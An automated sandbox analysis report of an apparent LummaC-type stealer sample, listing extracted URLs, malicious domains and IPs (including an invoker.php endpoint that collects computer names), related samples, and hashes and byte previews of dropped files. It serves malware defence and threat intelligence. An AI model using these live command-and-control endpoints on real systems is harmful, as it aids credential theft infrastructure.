https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	installer_1.05_36.4.exe.10.dr	false		high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_	installer_1.05_36.4.exe.10.dr	false		high
https://www.autoitscript.com/autoit3/	Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	false		high
https://klipsyzogey.shop/	Lightweight.com, 00000017.00000002.2307418203.0000000003B40000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://laborersquei.click/	Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.haxx.se/docs/http-cookies.html	7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false		high
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	installer_1.05_36.4.exe.10.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	false		high
http://x1.c.lencr.org/0	Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.Ah	powershell.exe, 0000001E.00000002.2367808691.0000000008D10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ssl.com/repository0	installer_1.05_36.4.exe.10.dr	false		high
https://dfgh.online	powershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compname=	powershell.exe, 0000001C.00000002.2165120458.0000000008212000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false		high
https://go.microsoft.c	powershell.exe, 0000001E.00000002.2348706080.0000000007572000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.crossteccorp.com	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	false	Avira URL Cloud: safe	unknown
https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa	7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 0000001C.00000002.2134794357.00000000053D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	false		high
https://contoso.com/Icon	powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://laborersquei.click:443/api	Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.microsx	powershell.exe, 0000001E.00000002.2321451025.0000000005724000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Lightweight.com, 00000017.00000000.1572086112.0000000000AE5000.00000002.00000001.01000000.00000009.sdmp, Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Organization.20.dr, Lightweight.com.13.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	installer_1.05_36.4.exe, 0000000C.00000000.1529422851.0000000000409000.00000002.00000001.01000000.00000008.sdmp, installer_1.05_36.4.exe.10.dr	false		high
http://www.google.comDUMPREQFLUSHD:/build/	7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Lightweight.com, 00000017.00000003.1953339162.0000000005885000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	false		high
https://epicsupport.force.com/unrealengine/s/	7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false	Avira URL Cloud: safe	unknown
http://llvm.org/):	7zG.exe, 0000000A.00000003.1473463761.000001BFD1599000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false		high
https://laborersquei.click/apie	Lightweight.com, 00000017.00000002.2300915900.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=user-PCLg	powershell.exe, 0000001C.00000002.2134794357.0000000005214000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	installer_1.05_36.4.exe.10.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.166.49	laborersquei.click	United States	13335	CLOUDFLARENETUS	true
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
172.67.214.186	klipsyzogey.shop	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581027
Start date and time:	2024-12-26 18:24:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	installer_1.05_36.4.zip
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winZIP@33/35@5/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 283 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .zip

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: installer_1.05_36.4.zip

Simulations

Behavior and APIs

Time	Type	Description
12:25:40	API Interceptor	1x Sleep call for process: installer_1.05_36.4.exe modified
12:26:14	API Interceptor	12x Sleep call for process: Lightweight.com modified
12:26:39	API Interceptor	23x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.166.49	Scanjet 23002022.xlsx	Get hash	malicious	Azorult gzRat	Browse	etapackbg.com/css/Sngggz.png
172.67.214.186	Set-up.exe	Get hash	malicious	LummaC	Browse
	setup.exe	Get hash	malicious	LummaC	Browse
	SET_UP.exe	Get hash	malicious	LummaC	Browse
	https://os50-card.ru/50	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
laborersquei.click	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.89.250
klipsyzogey.shop	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.214.186
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.214.186
	SET_UP.exe	Get hash	malicious	LummaC	Browse	172.67.214.186

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://contractnerds.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	Z4D3XAZ2jB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.93.162
	http://vanessa.nilsson@dmava.nj.gov	Get hash	malicious	Unknown	Browse	104.21.50.150
	https://www.gglusa.us/	Get hash	malicious	Unknown	Browse	104.18.11.207
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.134.27
	installer.msi	Get hash	malicious	Unknown	Browse	104.21.6.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.6.3
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
CLOUDFLARENETUS	https://contractnerds.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	Z4D3XAZ2jB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.93.162
	http://vanessa.nilsson@dmava.nj.gov	Get hash	malicious	Unknown	Browse	104.21.50.150
	https://www.gglusa.us/	Get hash	malicious	Unknown	Browse	104.18.11.207
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.134.27
	installer.msi	Get hash	malicious	Unknown	Browse	104.21.6.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.6.3
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
NTLGB	xd.arm7.elf	Get hash	malicious	Mirai	Browse	163.165.65.186
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	92.237.44.174
	telnet.ppc.elf	Get hash	malicious	Unknown	Browse	80.4.135.78
	armv4l.elf	Get hash	malicious	Mirai	Browse	62.254.229.173
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	82.3.236.97
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	213.107.138.142
	splarm7.elf	Get hash	malicious	Unknown	Browse	82.43.102.253
	jklspc.elf	Get hash	malicious	Unknown	Browse	86.21.69.116
	nabarm.elf	Get hash	malicious	Unknown	Browse	82.47.212.199
	splspc.elf	Get hash	malicious	Unknown	Browse	77.96.18.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	9idglWFv95.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	tJd3ArrDAm.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	gdtJGo7jH3.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	oQSTpQfzz5.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21
	rkPR0Fo9Cb.exe	Get hash	malicious	LummaC	Browse	172.67.214.186 172.67.166.49 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Set-up.exe	Get hash	malicious	LummaC	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse
	vce exam simulator 2.2.1 crackk.exe	Get hash	malicious	LummaC	Browse
	LVDdWBGnVE.exe	Get hash	malicious	LummaC Stealer	Browse
	eMBO6wS1b5.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	AxoPac.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19184
Entropy (8bit):	5.574615758601737
Encrypted:	false
SSDEEP:	384:8eBS5IwPKul6sDXJC7fdbnzDuqNCWUjaVjaxg9RT27f:3wPKG6uXULBTCLjaN/sj
MD5:	617D0DD5C80FC61E1B6D14C31A92B5C5
SHA1:	CB669B2D8843BFED049DB0AEECDA7E35DCDEE3E0
SHA-256:	DB57B8ED44EE4843F11AAD0F86ED7A6F6C3CF57225E9CD6A2C2A59C6AC9E9BC7
SHA-512:	A4ACCB1117B8DE493691BAA2F7B57C00BAE40DAD62507B7AD5DEE6EC383521B8D1CCF689F601FB197DD8B288F1400AAB3846A2DFB00A1B7CAD0523C55765F3FA
Malicious:	false
Preview:	@...e.................................X..............@..........H...............o..b~.D.poM...9..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0".......System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Set-up.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: PodcastsTries.exe, Detection: malicious, Browse Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse Filename: LVDdWBGnVE.exe, Detection: malicious, Browse Filename: eMBO6wS1b5.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: AxoPac.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\709182\N

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	475334
Entropy (8bit):	7.999569623103536
Encrypted:	true
SSDEEP:	12288:ykEViwwMnbe9alrkEbkVklZjFUqR0EBIU/M0cLWdyBut4Offn9:ytEwwIeUlrC6xFrb/MJKd0v41
MD5:	03AE6DCECFF953F258AF1E46B7C64B56
SHA1:	637EEE92F36824766941A77993232AF61F98EF88
SHA-256:	90DD3408B758CA4B3A6CCC298153518660CA997179C5EC42163E87CE7A051699
SHA-512:	02945AD71C6B9E9599E19A1A6E7021392F9339A1D9C45F105862F8736D81BD5FBA1F6EB28CEFDD3D8812843E747F9C92CC926D307FAE9FF8323960BEBA4D6B50
Malicious:	false
Preview:	....@......U.0...R....%\I..D~i...&n.x..dK.!k...N..P..5....4.e>L.Y....[..2.$t...>.....l.3U....\.m.\..x.9...0>..d..3..4.-.......H...2....e..U/..8..p............F..a.q`Aq\|.q...}....;.:>.....N..`2.l.y.)._F .@_./g;....MQ`..h.3".+.PCo.b.V...c@CZP...6CoF.8....+#N...k....=S.7.......+....T..(......3.$9....:......#.`.nj....5.kI....g.}..VQpq.....{.....'M).P7T.x.m...7<......eA..$..P............`.M].?.8/-b-....\|/.............j...?y]KP...b<.3. .C..X....#TW.+..................!....W.C~2......PV...v..u..T3m..'.VS.+...u.......m.,..Q..Q....7..!...%.Xm)...I.@S.J.jl..c....e.~>]..x.G..OX{..}.w........HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...5.=.'.F...h.............iW..&...iW..&...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~

C:\Users\user\AppData\Local\Temp\Bet

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	Microsoft Cabinet archive data, 488173 bytes, 10 files, at 0x2c +A "Bmw" +A "Exhibit", ID 6382, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488173
Entropy (8bit):	7.998336016759455
Encrypted:	true
SSDEEP:	12288:NjAAlkMYCbJezDf/jYGP3XzZYLs6jLGW5ekETq4h+8MAz49UK:2AlFJCDXjYQHV0s6jLG2FEZhkAz4D
MD5:	7A94B55C797CD4B6C1708E85EEE5FF26
SHA1:	A1765A10272E671CA987F79D0EFED259269DCF93
SHA-256:	3D8AD14A80662A2876789D560A1598E405E59634B0B715F518D496F34035A346
SHA-512:	A81D8AB3EF60377C8B6B1C78026B12D880D71E4FCA4FA5E3A8ADCA552171AD4BBCB1781E348DDC404FE9F287D36272C913A490E6B42B1429165D1BF33BFAE954
Malicious:	false
Preview:	MSCF.....r......,......................................YFE .Bmw............YFE .Exhibit.E..........YFE .M.....E......YFE .Straight.....E......YFE .Organization..H..E7.....YFE .Utils.....E......YFE .Turkish.....E......YFE .Riverside.....E......YFE .Mf....._......YFE .Handbags..3...K..CK...\|T.0~.+Y.] . A".J....%,.D.......,.......p.hK .d...{+.....U{....e.........+ .Ku.0.@.y.g..&Al..}..ts..<..3..<3g....s....?2g.p..=...\|.Ve...d..lr.XQY.\./Y.].z.?.....~.....f.O.O.gk...A..h.U.....c....s,Xe]..5.]..z...h.....w.[...!.q.Zrbr. .!...w.kU........G.P./U..w.)'.....`8..fmYq..\|.~.....z.......".C..T...2...(.{S5......kY._V..L.A@..?..A`.\.0.u..._ts.....B-v\|_....]'.]..1....<MCYgz.!.y..A.....,.2}.#&....,=e.fv.b.T.....@....Q. .Kp.}.~..+@...C.AH\|.9J....,...3..........9P.F.\|.Q.....mc.....)K^../F-...N..)^.7..{.H8.7_.....yzA"e.&9.w....I.x.C..~E..y.A.&.C..<\|..NB...@...0.2......e._.a...P...C...H..........p.~EB}....j..O..x...U<..W....~. Dfg7$..`..3.Q.g...0..F........;....^..x.

C:\Users\user\AppData\Local\Temp\Bmw

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	6.706138983890846
Encrypted:	false
SSDEEP:	1536:tI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMI/:K4CE0Imbi80PL
MD5:	5F75B451770B80BA4030B8B181EAA3AF
SHA1:	C88613AF396AE12B6DE9F67AF3F58C7F8054C7B2
SHA-256:	A9988F89F1AAA3674DAB275E824C66E94A4F38F8391977A744E61EE3A95C3AA3
SHA-512:	5C4A5CE1EA7CA8EE1B5616004AEEB04680C64939276749AB8E9947C94F497B5484F7F64661A23A325B424D393A1AFC18395D6C6EB5C546C15CC5C2CCDDAA04D6
Malicious:	false
Preview:	.f.p.Df..5`CJ...Y...Y....f.W...Y.f.\%.BJ...Y...X...Y...\.f.p....X...\...\.f..D$..D$.....-......A..-...f.s.&f.s.&f...f.U...\.......Y...X.f.V...\...Y.......\...Q.%.............f.T.f.s..f....f.V.f.n.f.p............Y<.p.J...Y...Y...Y...\.f.T..CJ...X...\...X.f..-XCJ...\...X.f...hCJ...^.f...`CJ.f.X..p.J.......Y...Y...Y.....Y...Y...X.f.....Y...X...X.%....f........f.p....X...\...X...X...X.f.W.f..D$..D$.......;..=.8........f...f.(5pCJ.f...f.(..CJ.f.(%.CJ.f.Y.f.(-.BJ....f.Y.f.Y.f.Y.......Y.f.X.f.Y...Y.f.X.f.p..f.Y.f.p....\.f.p....\...\...\...\...\...X.f..D$..D$.....-.;...........f.W.f.T=.CJ.f..%.CJ.f.(.pCJ...Y.f.(..CJ...\.f.(..CJ.f.p.D..Q.f.Y.f.p.Df....f.Y.f.X.f...0CJ.f.Y........Y.f.X.f.p.D..Y.f.T..CJ.f.Y.f.T.f.p.D..\...X...Y...\...\...Y.f.p....\...^...f.X.f.Y.f.p....X.%....f....f.p....X...X...X...X.f.W.f..D$..D$..........=..........f.~.f.s. f.~...........?+............f..T$.f.~.f.s. f.~........................f.W.f.W......f......Y..:......f..D$..T$......T$.....T$...$.....f..D$.......f..D$..

C:\Users\user\AppData\Local\Temp\Certificates

Download File

Process:	C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.99788181244933
Encrypted:	true
SSDEEP:	1536:m378CuEi18cY8d+VUd4TJ43MbNmXlAs/3FY/cbcxJ1NimR0edc+fz85FPi9iCQHp:mTu7Fdd+VUd4N0X/yUb8Cea2z8PaH/VU
MD5:	7B20D716504F9DBBED75028ADEB8E7CD
SHA1:	CE44372DA55901EE60293EBFD38F2B05C8FD1CBB
SHA-256:	4716BAB4A5FDBB0482DCEA819990C2A331F20967D6BC7D034749825CB0F568C5
SHA-512:	BD3915C342F460BE4A720BD6766654BE29BFABD5F580C07DEB54A843EB0BF9F16FE9EEC435EBB99496EA2ABEBC1E0164AA65FDC7AA125204B5D28D690B513442
Malicious:	false
